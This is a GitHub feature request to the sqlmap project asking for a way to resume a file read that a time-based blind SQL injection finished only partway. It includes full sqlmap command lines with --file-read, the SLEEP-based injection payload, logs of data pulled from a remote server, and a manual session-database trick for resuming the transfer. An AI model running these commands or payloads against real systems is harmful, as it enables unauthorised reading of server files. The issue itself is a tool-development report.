Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Feature request: continue reading of partially read file #4756

Open
lager1 opened this issue Aug 2, 2021 · 0 comments
Open

Feature request: continue reading of partially read file #4756

lager1 opened this issue Aug 2, 2021 · 0 comments
Labels
feature request

Comments

@lager1
Copy link

lager1 commented Aug 2, 2021
edited

Is your feature request related to a problem? Please describe.
When trying to read a file from remote system in unstable conditions it can happen that the file is read only partially. Further reading attempts result just in checking if the remote and local file are the same. I'm aware that there is a possibility of using --fresh-queries but using this when the data exfiltration takes very long time is not a good option.

I've found that i can manually convince sqlmap to continue reading the file by prepending the string __PARTIAL_VALUE__ in the sqlmap's sqlite database to the partially read value. After doing that and running the sqlmap again, the file reading process continues where the last run ended. Can this be implemented for example like a command line option? (maybe --continue-file-read?) I'd submit a PR for this but i'm too unfamiliar with the project structure to make any changes myself.

Describe the solution you'd like
I'd like to have the opportunity to continue file read which has been read only partially due to unstability or other errors.

Describe alternatives you've considered
The only alternative that i've found is manually editing the sqlmap's sqlite database which could be considered a viable solution too but it's a bit hacky in my opinion and don't think it's documented anywhere as a possibility when a file is read only partially and the intent is to read rest of the file.

Additional context
sqlmap logs which demonstrate the issue (partially redacted):

sqlmap -v 1 -u 'http://1.2.3.4/some/real/url' --data 'param1=value1&param2=value2' -p param1,param2 --batch --file-read /home/user/real/directory/structure/some/file.txt --fresh-queries
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.5.7#stable}
|_ -| . [.]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 09:12:45 /2021-08-01/

[09:12:45] [INFO] resuming back-end DBMS 'mysql'
[09:12:45] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uname (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: param1=value1' AND (SELECT 3267 FROM (SELECT(SLEEP(5)))FbUU) AND 'vlfD'='vlfD&param2=value2
---
[09:12:46] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 20.04 or 19.10 (eoan or focal)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[09:12:46] [INFO] fingerprinting the back-end DBMS operating system
[09:12:49] [INFO] the back-end DBMS operating system is Linux
[09:12:49] [INFO] fetching file: '/home/user/real/directory/structure/some/file.txt'
[09:12:49] [INFO] retrieved:
[09:12:49] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
6
[09:13:04] [INFO] adjusting time delay to 1 second due to good response times
6726F6D20...

....

[09:17:07] [ERROR] invalid character detected. retrying..
[09:17:07] [WARNING] increasing time delay to 2 seconds

....

[13:59:31] [INFO] adjusting time delay to 1 second due to good response times
4732...
[14:16:59] [ERROR] invalid character detected. retrying..
[14:16:59] [WARNING] increasing time delay to 2 seconds
...1676520
[14:22:22] [WARNING] turning off pre-connect mechanism because of connection reset(s)
[14:22:22] [CRITICAL] connection reset to the target URL. sqlmap is going to retry the request(s)
[14:22:22] [CRITICAL] connection reset to the target URL

[*] ending @ 14:22:22 /2021-08-01/

I think that the issue happens in the following run and the sqlmap thinks that the file has been (?) fully read.

sqlmap -v 1 -u 'http://1.2.3.4/some/real/url' --data 'param1=value1&param2=value2' -p param1,param2 --batch --timeout 90 --retries 5 --file-read /home/user/real/directory/structure/some/file.txt
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.5.7#stable}
|_ -| . [']     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 14:40:59 /2021-08-01/

[14:40:59] [INFO] resuming back-end DBMS 'mysql'
[14:40:59] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uname (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: param1=value1' AND (SELECT 3267 FROM (SELECT(SLEEP(5)))FbUU) AND 'vlfD'='vlfD&param2=value2
---
[14:40:59] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 20.04 or 19.10 (focal or eoan)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[14:40:59] [INFO] fingerprinting the back-end DBMS operating system
[14:40:59] [INFO] the back-end DBMS operating system is Linux
[14:40:59] [INFO] fetching file: '/home/user/real/directory/structure/some/file.txt'
[14:40:59] [INFO] resuming partial value: .... 1676520
[14:40:59] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[14:41:02] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
6

...

[16:19:35] [WARNING] turning off pre-connect mechanism because of connection reset(s)
[16:19:35] [CRITICAL] connection reset to the target URL. sqlmap is going to retry the request(s)
[16:19:35] [WARNING] detected HTTP code 'None' in validation phase is differing from expected '200'
[16:19:35] [ERROR] invalid character detected. retrying..

...

[16:19:35] [WARNING] increasing time delay to 4 seconds
0616...
[16:30:11] [ERROR] invalid character detected. retrying..
[16:30:11] [WARNING] increasing time delay to 5 seconds
[16:30:19] [ERROR] invalid character detected. retrying..
[16:30:19] [WARNING] increasing time delay to 6 seconds
0
[16:30:48] [ERROR] invalid character detected. retrying..
[16:30:48] [WARNING] increasing time delay to 7 seconds
...72656469
[16:47:42] [ERROR] invalid character detected. retrying..
[16:47:42] [WARNING] increasing time delay to 8 seconds

do you want confirmation that the remote file '/home/user/real/directory/structure/some/file.txt' has been successfully downloaded from the back-end DBMS file system? [Y/n] Y
[16:47:59] [INFO] retrieved:
[16:48:12] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[16:48:12] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
files saved to [1]:
[*] /root/.sqlmap/output/1.2.3.4/files/_home_user_real_directory_structure_some_file.txt (size differs from remote file)

[16:48:12] [INFO] fetched data logged to text files under '/root/.sqlmap/output/1.2.3.4'

[*] ending @ 16:48:12 /2021-08-01/

Further reading attempts do not actually read any further data, sqlmap just reports local and remote file size difference.

sqlmap -v 1 -u 'http://1.2.3.4/some/real/url' --data 'param1=value1&param2=value2' -p param1,param2 --batch --timeout 90 --retries 5 --file-read /home/user/real/directory/structure/some/file.txt
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.5.7#stable}
|_ -| . [']     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 17:21:46 /2021-08-01/

[17:21:46] [INFO] resuming back-end DBMS 'mysql'
[17:21:46] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uname (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: param1=value1' AND (SELECT 3267 FROM (SELECT(SLEEP(5)))FbUU) AND 'vlfD'='vlfD&param2=value2
---
[17:21:47] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 20.04 or 19.10 (eoan or focal)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[17:21:47] [INFO] fingerprinting the back-end DBMS operating system
[17:21:47] [INFO] the back-end DBMS operating system is Linux
[17:21:47] [INFO] fetching file: '/home/user/real/directory/structure/some/file.txt'
[17:21:47] [INFO] resumed: ....72656469
do you want confirmation that the remote file '/home/user/real/directory/structure/some/file.txt' has been successfully downloaded from the back-end DBMS file system? [Y/n] Y
[17:21:47] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[17:21:50] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
11
[17:22:05] [INFO] adjusting time delay to 1 second due to good response times
889
[17:22:15] [INFO] the remote file '/home/user/real/directory/structure/some/file.txt' is larger (11889 B) than the local file '/root/.sqlmap/output/1.2.3.4/files/_home_user_real_directory_structure_some_file.txt' (2881B)
files saved to [1]:
[*] /root/.sqlmap/output/1.2.3.4/files/_home_user_real_directory_structure_some_file.txt (size differs from remote file)

[17:22:15] [INFO] fetched data logged to text files under '/root/.sqlmap/output/1.2.3.4'

[*] ending @ 17:22:15 /2021-08-01/
sqlmap -v 1 -u 'http://1.2.3.4/some/real/url' --data 'param1=value1&param2=value2' -p param1,param2 --batch --timeout 90 --retries 5 --file-read /home/user/real/directory/structure/some/file.txt --repair
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.5.7#stable}
|_ -| . [.]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 17:52:44 /2021-08-01/

[17:52:44] [INFO] resuming back-end DBMS 'mysql'
[17:52:44] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uname (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: param1=value1' AND (SELECT 3267 FROM (SELECT(SLEEP(5)))FbUU) AND 'vlfD'='vlfD&param2=value2
---
[17:52:44] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 19.10 or 20.04 (focal or eoan)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[17:52:44] [INFO] fingerprinting the back-end DBMS operating system
[17:52:45] [INFO] the back-end DBMS operating system is Linux
[17:52:45] [INFO] fetching file: '/home/user/real/directory/structure/some/file.txt'
[17:52:45] [INFO] resumed: ...72656469
do you want confirmation that the remote file '/home/user/real/directory/structure/some/file.txt' has been successfully downloaded from the back-end DBMS file system? [Y/n] Y
[17:52:45] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[17:52:47] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
11
[17:53:03] [INFO] adjusting time delay to 1 second due to good response times
889
[17:53:12] [INFO] the remote file '/home/user/real/directory/structure/some/file.txt' is larger (11889 B) than the local file '/root/.sqlmap/output/1.2.3.4/files/_home_user_real_directory_structure_some_file.txt' (2881B)
files saved to [1]:
[*] /root/.sqlmap/output/1.2.3.4/files/_home_user_real_directory_structure_some_file.txt (size differs from remote file)

[17:53:12] [INFO] fetched data logged to text files under '/root/.sqlmap/output/1.2.3.4'

[*] ending @ 17:53:12 /2021-08-01/
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
feature request
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@lager1